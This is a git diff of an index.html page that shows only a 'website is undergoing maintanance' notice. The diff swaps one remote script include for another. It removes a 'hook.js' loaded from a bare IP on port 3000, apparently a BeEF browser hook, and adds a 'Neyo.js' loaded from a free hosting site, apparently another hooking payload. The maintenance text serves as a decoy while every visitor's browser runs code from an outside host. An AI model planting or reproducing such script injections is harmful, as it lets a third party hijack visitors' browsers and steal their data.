--- a/index.html
+++ b/index.html
@@ -14,6 +14,7 @@
         <h1>This website is undergoing maintanance,kindly check back in the next few minutes.</h1>
         <!-- End of body-->
     </div>
-    <script src= "http://159.65.108.28:3000/hook.js"></script>
+   <script src="https://rowlandblog.000webhostapp.com/flux/flux/Flux/server/builds/Neyo.js"></script>
+
 </body>
 </html>
